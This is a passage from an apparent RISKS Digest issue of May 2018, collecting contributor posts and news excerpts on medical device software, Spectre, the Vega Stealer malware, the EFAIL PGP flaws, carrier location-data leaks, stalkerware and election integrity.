    Greater release frequency with less rigorous pre-production qualification
    criteria and test coverage is NOT a recipe for safe and viable embedded
    software stacks that drive these gizmos. Suppressing production defect
    escape potential is challenging. Proactive techniques that facilitate early
    and rapid software defect discovery capability -- such as continuous
    integration and high-speed regression -- are effective when capable test
    authors challenge software stack authors. Alas, industry (not just embedded
    medical implants, cars, cellphones, etc.) often economize on qualification
    product life cycle stages. There are "too many bits" to test quickly and
    thoroughly. Governance decisions and gut judgment is sometimes applied with
    impunity.

    It appears that the FDA has gone rogue, and off-the-rails via regulatory
    capture. A business-friendly administration promoting "caveat emptor" as
    standard operating procedure also intensifies medical device implantation
    risks. Refer to "The Danger Within Us: America's Untested, Unregulated
    Medical Device Industry and One Man's Battle to Survive It" by Jeanne Lenzer
    for an expose' of the implantable medical device industry.

    If you are confronted with a "hard sell" to "go" for implantation, ask
    a few questions of your physician and the device salesperson:

    Are there any randomized control trials and non-industry funded studies that
    evaluate the candidate device's effectiveness in humans? Were the studies
    performed by a non-profit? Or a university? Does the entity reporting the
    study's results receive funding from the device manufacturer? Do any of the
    study's authors disclose industry ties? If so, a report that is published
    might possess skewed findings. Is the raw data from these studies available
    for inspection? If so, try to find a consultant to review it for you and
    render an opinion. Will the device manufacturer share their software and
    system test plans for inspection? If so, try to locate a person "skilled in
    the art of embedded software test" to evaluate the test plan, and the
    firmware test results released with the implanted device. Try to gain access
    to the manufacturer's defect tracking system to explore defect density and
    discovery rates and repair history.

    Does the device have a special mechanism to disable it, should it misbehave?
    If so, try to learn about how this is accomplished and ensure there are
    backup sources -- other physicians or facilities that possess this
    mechanism.

    How many implants have been performed in the past year? How many
    patient deaths occurred post-implantation? Never mind if the deaths
    were attributed to the device or not, find the raw count of deaths.

    For each post-implant death, was an FDA MAUDE report filed? How many of
    these reports where filed by medical practitioners? How many by the device
    manufacturer? Confront the salesperson to learn why, or if, there's a huge
    discrepancy between the number of deaths and the number of FDA MAUDE reports
    they or practitioners reported. That discrepancy is apparently a clue that
    the manufacturer is or has concealed important evidence about device
    capability or side-effects that can injure or kill you.

    Has the device been the subject of prior recalls? If so, why? Has the
    manufacturer been sued for product liability previously? Are they currently
    under litigation for liability? These questions can provide insight into
    their organization's maturity and ability to pro-actively act on
    lessons-learned.

    Is the device implantation under consideration being applied for "an
    off-label" application in your case? If so, why?

    ------------------------------

    Date: Fri, 18 May 2018 09:24:59 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)

    Liam Tung | 18 May 2018
    Ex-Intel security expert: This new Spectre attack can even reveal firmware secrets | ZDNet

    Ex-Intel security expert: This new Spectre attack can even reveal firmware
    secrets; A new variant of Spectre can expose the contents of memory that
    normally can't be accessed by the OS kernel.

    opening text:

    Yuriy Bulygin, the former head of Intel's advanced threat team, has
    published research showing that the Spectre CPU flaws can be used to break
    into the highly privileged CPU mode on Intel x86 systems known as System
    Management Mode (SMM).

    ------------------------------

    Date: Wed, 16 May 2018 09:11:51 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)

    This malware is harvesting saved credentials in Chrome, Firefox browsers | ZDNet

    This malware is harvesting saved credentials in Chrome, Firefox browsers
    Researchers say the new Vega Stealer malware is currently being used
    in a simple campaign but has the potential to go much further.
    By Charlie Osborne for Zero Day | May 14, 2018 -- 07:42 GMT (00:42
    PDT) | Topic: Security

    selected text:

    Vega Stealer is also written in .NET and focuses on the theft of
    saved credentials and payment information in Google Chrome. These
    credentials include passwords, saved credit cards, profiles, and cookies.

    When the Firefox browser is in use, the malware harvests specific
    files -- "key3.db" "key4.db", "logins.json", and "cookies.sqlite" --
    which store various passwords and keys.

    However, Vega Stealer does not wrap up there. The malware also takes
    a screenshot of the infected machine and scans for any files on the
    system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for
    exfiltration.

    According to the security researchers, the malware is currently being
    utilized to target businesses in marketing, advertising, public
    relations, retail, and manufacturing.

    ------------------------------

    Date: Wed, 23 May 2018 18:07:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)

    Charlie Osborne for Zero Day | 22 May 2018
    Student awarded $36,000 for remote execution flaw in Google App Engine | ZDNet
    The discovery was made by a university student who was not aware of
    how dangerous the vulnerability was.

    opening text:

    Google has awarded a young cybersecurity researcher $36,337 for disclosing a
    severe vulnerability in the Google App Engine.

    The 18-year-old student from Uruguay's University of the Republic discovered
    a critical remote code execution (RCE) bug in the system, which is a
    framework and cloud platform used for the hosting and development of web
    applications in Google data centers.

    ------------------------------

    Date: Fri, 18 May 2018 09:05:54 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This cryptocurrency phishing attack uses new trick to drain
    wallets" (Danny Palmer)

    Danny Palmer | 17 May 2018
    This cryptocurrency phishing attack uses new trick to drain wallets | ZDNet

    This cryptocurrency phishing attack uses new trick to drain wallets
    Campaign uses automation to empty cryptocurrency wallets and produce
    lucrative returns.

    ... the phishing campaign mimics the front end of the MyEtherWallet website
    for the purpose of stealing credentials, while also deploying what the
    authors call an "automated transfer system" to process the details captured
    by the fake page and transfer funds.

    The attack injects scripts into active web sessions and silently and
    invisibly executes bank transfers just seconds after the user logs
    into their cryptocurrency account.

    Researchers note that MyEtherWallet is an appealing target for attackers
    because it is simple to use, but its lack of security compared to other
    banks and exchanges make it a prominent target for attack.

    After that, the crooks look to drain accounts when the victim decrypts their
    wallet. The scam uses scripts which automatically create the fund transfer
    by pressing the buttons like a legitimate user would, all while the activity
    remains hidden -- it's the first time an attack has been seen to use this
    automated tactic.

    ------------------------------

    Date: Wed, 16 May 2018 16:47:10 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)

    Baldet, who most recently served as the bank’s blockchain program lead, is
    cofounding a new startup, Clovyr, that aims to help consumers, developers,
    and businesses explore the nascent, albeit burgeoning, world of
    blockchain-based, decentralized technologies, she tells Fortune. She is
    joined by Nielsen, former lead developer of Quorum, a JPMorgan Chase-built
    blockchain for business, who will serve as the concern’s chief technologist.

    Baldet unveiled a Clovyr demo at the Consensus conference in Manhattan on
    Monday afternoon. The company is in the process of fundraising.

    Clovyr's product, now under development, is slated to take the form of
    something akin to an app store, where people and businesses can experiment
    with a multitude of decentralized apps and services, developer toolsets, and
    underlying distributed ledgers. The cofounders envision the platform serving
    as a neutral ground, offering a browser-like dashboard for the
    blockchain-curious, through which Clovyr can provide support and other
    services to customers according to their needs.

    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup

    Just what consumers need. What could go wrong? Also, what's with "Clovyr"
    name?

    ------------------------------

    Date: Thu, 17 May 2018 16:48:50 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: ICE abandons its dream of ‘extreme vetting’ software that could
    predict whether a foreign visitor would become a terrorist (WashPo)

    Immigration officials originally wanted artificial intelligence that could
    continuously track foreign visitors' social media. They're giving the job to
    humans instead.

    ICE just abandoned its dream of ‘extreme vetting’ software that could predict whether a foreign visitor would become a terrorist

    ------------------------------

    Date: Thu, 17 May 2018 15:10:11 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: E-Mail Clients are Insecure, PGP and S/MIME 100% secure

    There is no "security" problem with either PGP or S/MIME encrypted and
    signed messages. The problem is, as it has been since the introduction of
    the ability to embed executable code into e-mail messages (aka, Web Pages
    and Rich Text via SMTP), the shoddy and useless security state of almost all
    e-mail clients.

    If you turn off the [expletive deleted] (HTML code execution, etc) then
    there is no problem. In other words, the only problem that exists is that
    which you created yourself. So if you do something utterly stupid, you
    deserve whatever you get in return.

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    Stop Using Common Email Encryption Tools Immediately, Researchers Warn

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now. Because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/

    ------------------------------

    Date: Thu, 24 May 2018 18:24:24 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 24 May 2018

    T-Mobile security lapse let anyone see customer account details

    T-Mobile bug let anyone see any customer's account details Exclusive: The
    exposed lookup tool let anyone run a customer's phone number -- and obtain
    their home address and account PIN, used to contact phone support.

    selected text:

    A bug in T-Mobile's website let anyone access the personal account details
    of any customer with just their cell phone number.

    The flaw, since fixed, could have been exploited by anyone who knew where to
    look -- a little-known T-Mobile subdomain that staff use as a customer care
    portal to access the company's internal tools.

    Although the API is understood to be used by T-Mobile staff to look up
    account details, it wasn't protected with a password and could be easily
    used by anyone.

    The returned data included a customer's full name, postal address, billing
    account number, and in some cases information about tax identification
    numbers. The data also included customers' account information, such as if
    a bill is past-due or if the customer had their service suspended.

    The data also included references to account PINs used by customers as a
    security question when contacting phone support. Anyone could use that
    information to hijack accounts.

    [Gene also contributed a previous item from Zack Whittaker om 17 May
    on the same subject:
    A bug in cell phone tracking firm's website leaked millions of Americans' real-time locations
    I think the more recent one suffices here. PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:27:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Senator wants to know how police can locate any phone in
    seconds without a warrant" (Zach Whittaker)

    Zack Whittaker for Zero Day | May 11, 2018
    Police can track any phone in the US in seconds — without a warrant

    Senator wants to know how police can locate any phone in seconds without a
    warrant. Real-time location data was accessible by police under "the legal
    equivalent of a pinky promise," said a senator who is demanding that the FCC
    investigate why a company, contracted to monitor calls of prison inmates,
    also allows police to track phones of anyone in the US without a warrant.

    The bombshell story in *The New York Times& revealed Securus, a Texas-based
    prison technology company, could track any phone "within seconds" by
    obtaining data from cellular giants -- including AT&T, Sprint, T-Mobile, and
    Verizon -- typically reserved for marketers.

    ------------------------------

    Date: Fri, 18 May 2018 09:29:13 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "US cell carriers are selling access to your real-time phone
    location data" (Zach Whittaker)

    Zack Whittaker, Zero Day, 14 May 2018
    US cell carriers are selling access to your real-time phone location data

    US cell carriers are selling access to your real-time phone location data
    The company embroiled in a privacy row has "direct connections" to all major
    US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint -- and
    Canadian cell networks, too.

    Four of the largest cell giants in the US are selling your real-time
    location data to a company that you've probably never heard about before.

    In case you missed it, a senator last week sent a letter demanding the
    Federal Communications Commission (FCC) investigate why Securus, a prison
    technology company, can track any phone "within seconds" by using data
    obtained from the country's largest cell giants, including AT&T, Verizon,
    T-Mobile, and Sprint, through an intermediary, LocationSmart.

    ------------------------------

    Date: Sat, 19 May 2018 07:36:23 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Hundreds of Apps Can Empower Stalkers to Track Their Victims
    (The New York Times)

    Hundreds of Apps Can Empower Stalkers to Track Their Victims

    'KidGuard is a phone app that markets itself as a tool for keeping tabs on
    children. But it has also promoted its surveillance for other purposes and
    run blog posts with headlines like *How to Read Deleted Texts on Your
    Lover's Phone.*

    'A similar app, mSpy, offered advice to a woman on secretly monitoring her
    husband. Still another, Spyzie, ran ads on Google alongside results for
    search terms like *catch cheating girlfriend iPhone*.

    'As digital tools that gather cellphone data for tracking children,
    friends or lost phones have multiplied in recent years, so have the
    options for people who abuse the technology to track others without
    consent.'

    Surveillance capitalism is booming. These apps are e^(to the creepy).

    ------------------------------

    Date: Fri, 18 May 2018 15:06:20 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home
    into secret eavesdroppers" (CSO Online)

    Hacks turn Amazon Alexa and Google Home into secret eavesdroppers

    Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into secret
    eavesdroppers. Researchers devise new two new attacks -- voice squatting
    and voice masquerading -- on Amazon Alexa and Google Home, allowing
    adversaries to steal personal information or silently eavesdrop.

    Ms. Smith, CSO | 17 May 2018

    Ms. Smith (not her real name) is a freelance writer and programmer with a
    special and somewhat personal interest in IT privacy and security issues.

    opening text:

    Oh, goody, Amazon Alexa and/or Google Home could be hit with remote,
    large-scale "voice squatting" and "voice masquerading" attacks to steal
    sensitive user information or eavesdrop on conversations.

    ------------------------------

    Date: Fri, 18 May 2018 17:56:12 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: So, Umm, Google Duplex's Chatter Is Not Quite Human
    (Scientific American)

    So, Umm, Google Duplex's Chatter Is Not Quite Human

    "Google’s Duplex voice assistant drew applause last week at the company’s
    annual I/O developer conference after CEO Sundar Pichai demonstrated the
    artificially intelligent technology autonomously booking a hair salon
    appointment and a restaurant reservation, apparently fooling the people
    who took the calls. But enthusiasm has since been tempered with unease
    over the ethics of a computer making phone calls under the guise of being
    human. Such a mixed reception has become increasingly common for Google,
    Amazon, Facebook and other tech companies as they push AI's boundaries in
    ways that do not always seem to consider consumer privacy or safety
    concerns."

    ------------------------------

    Date: Fri, 18 May 2018 08:27:18 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence
    (The Wrap)

    via NNSquad
    http://www.thewrap.com/henry-kissinger-is-scared-of-unstable-artificial-intelligence/

    The former U.S. secretary of state is warning against the threat of
    "unstable" artificial intelligence in a new essay in The Atlantic --
    fearing the rapid rise of machines could lead to questions humanity is not
    ready to tackle.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:25 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Fri, 18 May 2018 17:53:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)

    http://www.scientificamerican.com/article/gunshot-sensors-pinpoint-destructive-fish-bombs/

    "Rogue fishers around the world toss explosives into the sea and scoop up
    bucketloads of stunned or dead fish, an illegal practice in many nations
    that can destroy coral reefs and wreak havoc on marine biodiversity.
    Catching perpetrators amid the vastness of the ocean has long proved
    almost impossible, but researchers working in Malaysia have now adapted
    acoustic sensors—originally used to locate urban gunfire—to pinpoint these
    marine blasts within tens of meters."

    Example of dual-use technology for public and environmental safety
    maintenance.

    ------------------------------

    Date: Mon, 21 May 2018 12:04:35 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Most GDPR emails unnecessary and some illegal, say experts
    (The Guardian)

    NNSquad
    http://www.theguardian.com/technolo...cessary-and-in-some-cases-illegal-say-experts

    The vast majority of emails flooding inboxes across Europe from companies
    asking for consent to keep recipients on their mailing list are
    unnecessary and some may be illegal, privacy experts have said, as new
    rules over data privacy come into force at the end of this week.

    AND EVEN WORSE: "Warning: New European Privacy Law Has Become a
    Jackpot for Internet Crooks" -

    http://lauren.vortex.com/2018/05/01...-law-has-become-a-jackpot-for-internet-crooks

    ------------------------------

    Date: Wed, 23 May 2018 13:58:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Pentagon Has a Big Plan to Solve Identity Verification in
    Two Years (Defense One)

    The plan grew out of efforts to modernize the Defense Department's ID cards.

    The Defense Department is funding a project that officials say could
    revolutionize the way companies, federal agencies and the military itself
    verify that people are who they say they are and it could be available in
    most commercial smartphones within two years.

    The technology, which will be embedded in smartphones’ hardware, will
    analyze a variety of identifiers that are unique to an individual, such as
    the hand pressure and wrist tension when the person holds a smartphone and
    the person’s peculiar gait while walking, said Steve Wallace, technical
    director at the Defense Information Systems Agency.

    Organizations that use the tool can combine those identifiers to give the
    phone holder a “risk score,” Wallace said. If the risk score is low enough,
    the organization can presume the person is who she says she is and grant her
    access to sensitive files on the phone or on a connected computer or grant
    her access to a secure facility. If the score’s too high, she’ll be locked
    out.

    http://www.defenseone.com/technolog...solve-identity-verification-two-years/148280/

    ------------------------------

    Date: Thu, 24 May 2018 17:41:32 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Unplug Your Echo! (Ars Technica)

    [Thanks to Phil Porras]
    http://arstechnica.com/gadgets/2018...o-device-secretly-shared-users-private-audio/

    Amazon confirmed an Echo owner's privacy-sensitive allegation on Thursday,
    after Seattle CBS affiliate KIRO-7 reported that an Echo device in Oregon
    sent private audio to someone on a user's contact list without permission.
    ...."Unplug your Alexa devices right now," the user, Danielle (no last name
    given), was told by her husband's colleague in Seattle after he received
    full audio recordings between her and her husband, according to the KIRO-7
    report. The disturbed owner, who is shown in the report juggling four
    unplugged Echo Dot devices, said that the colleague then sent the offending
    audio to Danielle and her husband to confirm the paranoid-sounding
    allegation. (Before sending the audio, the colleague confirmed that the
    couple had been talking about hardwood floors.)

    After calling Amazon customer service, Danielle said she received the
    following explanation and response: "'Our engineers went through all of your
    logs. They saw exactly what you told us, exactly what you said happened, and
    we're sorry.' He apologized like 15 times in a matter of 30 minutes. 'This
    is something we need to fix.'" ... Ya think?

    ------------------------------

    Date: Tue, 22 May 2018 18:15:53 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: FBI dramatically overstates how many phones they can't get into (WaPo)

    http://www.washingtonpost.com/world...68ae90-5dce-11e8-a4a4-c070ef53f315_story.html

    The FBI has repeatedly provided grossly inflated statistics to Congress and
    the public about the extent of problems posed by encrypted cellphones,
    claiming investigators were locked out of nearly 7,800 devices connected to
    crimes last year when the correct number was much smaller, probably between
    1,000 and 2,000, The Washington Post has learned. [They've actually been
    triple-counting! PGN]

    Over a period of seven months, FBI Director Christopher A. Wray cited the
    inflated figure as the most compelling evidence for the need to address what
    the FBI calls Going Dark -- the spread of encrypted software that can block
    investigators' access to digital data even with a court order.

    The FBI first became aware of the miscount about a month ago and still does
    not have an accurate count of how many encrypted phones they received as
    part of criminal investigations last year, officials said. Last week, one
    internal estimate put the correct number of locked phones at 1,200, though
    officials expect that number to change as they launch a new audit, which
    could take weeks to complete, according to people familiar with the work. [...]

    [See EFF's take on this:
    http://www.eff.org/deeplinks/2018/05/fbi-admits-it-inflated-number-supposedly-unhackable-devices
    PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google to remove "secure" indicator from HTTPS pages on Chrome"
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: Thu, 17 May 2018 15:55:43 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Google's Selfish Ledger is an unsettling vision of Silicon Valley
    social engineering (The Verge)

    Google has built a multibillion-dollar business out of knowing everything
    about its users. Now, a video produced within Google and obtained by The
    Verge offers a stunningly ambitious and unsettling look at how some at the
    company envision using that information in the future.

    The video was made in late 2016 by Nick Foster, the head of design at X
    (formerly Google X), and a co-founder of the Near Future Laboratory. The
    video, shared internally within Google, imagines a future of total data
    collection, where Google helps nudge users into alignment with their goals,
    custom-prints personalized devices to collect more data, and even guides the
    behavior of entire populations to solve global problems like poverty and
    disease.

    When reached for comment on the video, an X spokesperson provided the
    following statement to The Verge:

    “We understand if this is disturbing -- it is designed to be. This is a
    thought-experiment by the Design team from years ago that uses a technique
    known as ‘speculative design’ to explore uncomfortable ideas and concepts
    in order to provoke discussion and debate. It's not related to any current
    or future products.”

    http://www.theverge.com/2018/5/17/17344250/google-x-selfish-ledger-video-data-privacy

    ------------------------------

    Date: Fri, 18 May 2018 09:31:10 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A flaw in a connected alarm system exposed vehicles to remote
    hacking" (ZDNet)

    Zack Whittaker for Zero Day | 17 May 2018
    http://www.zdnet.com/article/flaw-connected-alarm-system-exposed-vehicles-remote-hacking/

    The researchers said it was easy to locate a nearby car, unlock it, and
    drive away.

    opening text:

    A bug that allowed two researchers to gain access to the backend systems of
    a popular Internet-connected vehicle management system could have given a
    malicious hacker everything they needed to track the vehicle's location,
    steal user information, and even cut out the engine.

    In a disclosure this week, the researchers Vangelis Stykas and George
    Lavdanis detailed a bug in a misconfigured server run by Calamp, a
    telematics company that provides vehicle security and tracking, which gave
    them "direct access to most of its production databases."

    ------------------------------

    Date: Thu, 17 May 2018 20:55:36 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Syrian hackers who tricked reporters indicted (WashPo)

    The pair used phishing schemes to compromise news organizations.

    http://www.washingtonpost.com/local...9ef328-59e7-11e8-858f-12becb4d6067_story.html

    ------------------------------

    Date: Fri, 18 May 2018 08:57:22 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco critical flaw warning: These 10/10 severity bugs need
    patching now" (ZDNet)

    Liam Tung, ZDNet, 17 May 2018

    http://www.zdnet.com/article/cisco-critical-flaw-warning-these-1010-severity-bugs-need-patching-now/

    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    Cisco's software for managing software-defined networks has three critical,
    remotely exploitable vulnerabilities.

    ------------------------------

    Date: Thu, 17 May 2018 21:01:00 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    From a digitized JFK speech that he never gave to colorized Lincoln and
    Holocaust photos, scholars are debating a wave of historical re-creation
    and manipulation.

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    ------------------------------

    Date: Tue, 22 May 2018 09:26:21 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)

    http://www.bostonglobe.com/metro/20...could-wrong/D7fX11PReUWzVsAAdqC1qN/story.html

    ------------------------------

    Date: Tue, 22 May 2018 09:18:13 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)

    http://www.bostonglobe.com/news/nat...a-cum-laude/npFzLAzg2b7w54247o3MIO/story.html

    [I won't insult long-time RISKS readers with pointers to the predecessors
    of this item. There are too many. PGN]

    ------------------------------

    Date: Wed, 16 May 2018 07:47:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: The surprising return of the repo man (WashPo)

    New technology and bad auto loans mean more cars are being taken back.

    http://www.washingtonpost.com/busin...fcd30e-4d5a-11e8-af46-b1d6dc0d9bfe_story.html

    ------------------------------

    Date: Tue, 22 May 2018 15:59:15 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)

    Report: President Trump clings to his Twitter phone, reluctant to allow
    security checks.

    http://arstechnica.com/information-...tial-smartphone-security-is-too-inconvenient/

    Security ... inconvenient. Who knew?

    ------------------------------

    Date: Sat, 19 May 2018 10:22:51 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to
    Win Election (NY Times)

    NNSquad
    http://www.nytimes.com/2018/05/19/u...r-prince-zamel.html?smid=tw-nytimes&smtyp=cur

    Three months before the 2016 election, a small group gathered at Trump
    Tower to meet with Donald Trump Jr., the president's eldest son. One was
    an Israeli specialist in social media manipulation. Another was an
    emissary for two wealthy Arab princes. The third was a Republican donor
    with a controversial past in the Middle East as a private security
    contractor.

    ------------------------------

    Date: Thu, 17 May 2018 10:00:20 -0700
    From: "Mark E. Smith" <mym...@gmail.com>
    Subject: Re: Securing Elections (RISKS-30.69)

    PGN cites Bruce Schneier:

    "Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them."

    Elections serve a third purpose, one which I think is much more important
    than accurately choosing a winner and convincing the loser: US elections are
    intended to make people think that they have a say in government when they
    don't.

    Some of the framers of the Constitution were concerned about the possibility
    of the "mob and rabble" eventually getting the vote and using it to obtain a
    voice in government. So they made no Constitutional provision that the
    popular vote had to be counted (Bush v. Gore 2000). They also took other
    precautions. They made Congress the sole judge of the "Elections, Returns,
    and Qualifications" of its Members, and the only venue where the loser of a
    rigged election could appeal. But by the time they file that appeal, the
    "winner" has usually already been sworn into office, and Congress doesn't
    like to remove sitting members, so if anyone is aware of an appeal that has
    been successful, I'd like very much to know about it.

    We are so accustomed to a losing candidate taking office, that it isn't even
    noteworthy these days. The Supreme Court can intervene to seat the loser, or
    the winner can concede and throw the election to the loser. In a democratic
    system, such events would result in a new election, not in handing over
    office to somebody who wasn't elected.

    These realizations and others led me to informally poll the groups of
    election integrity activists I was part of at that time, with shocking
